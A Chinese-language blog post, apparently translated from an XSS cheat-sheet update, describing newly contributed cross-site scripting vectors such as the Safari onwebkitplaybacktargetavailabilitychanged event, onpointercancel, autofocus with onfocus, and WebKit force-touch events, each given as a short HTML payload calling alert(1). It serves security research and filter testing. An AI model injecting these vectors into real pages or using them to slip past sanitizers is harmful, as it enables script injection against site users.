XSS 攻击向量新发现:onwebkitplaybacktargetavailabilitychanged 等罕见事件解析

本文介绍了XSS攻击向量中的新发现,包括Safari专属的onwebkitplaybacktargetavailabilitychanged事件、需要用户交互的onpointercancel事件以及autofocus属性的扩展使用,同时涵盖了多个WebKit触控板事件,为安全研究人员提供了最新的攻击向量参考。

onwebkitplaybacktargetavailabilitychanged?! XSS 攻击向量中的新奇特事件

我们的 XSS 攻击向量速查表 的强大之处在于能够获得来自 Web 安全社区的出色贡献,本次更新也不例外。Mozilla 提供了宝贵贡献,移除了在 Firefox 中不再与 marquee 标签配合使用的事件。

来自 @amirmsafari 的一个非常晦涩的 Safari 专属向量使用了 onwebkitplaybacktargetavailabilitychanged 事件,该事件适用于 audio 和 video 标签:

1

<audio onwebkitplaybacktargetavailabilitychanged=alert(1)>

我们收到了来自 @Wcraft-log 的提交,涉及 onpointercancel 事件,该事件需要大量用户交互:

1

<xss onpointercancel=alert(1)>XSS</xss>

@Filipnyquist 指出我们没有记录几乎所有元素现在都可以使用 autofocus 属性。这一点较早前由 @RenwaX23@lbherrera_ 发现。

1

<xss onfocus=alert(1) autofocus tabindex=1>

最后,我们收到了来自 @zhenwarx 的提交,显示我们遗漏了一大批需要用户与触控板交互的 WebKit 事件。

1
2
3
4
5

<xss onwebkitmouseforceup=alert(1)>XSS</xss>
<xss onwebkitmouseforcewillbegin=alert(1)>XSS</xss>
<xss onwebkitmouseforceup=alert(1)>XSS</xss>
<xss onwebkitmouseforcedown=alert(1)>XSS</xss>
<xss onwebkitmouseforcechanged=alert(1)>XSS</xss>

注意:如果您想知道我们用什么来生成代码片段图像,我们使用的是优秀的在线工具 Ray.so

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次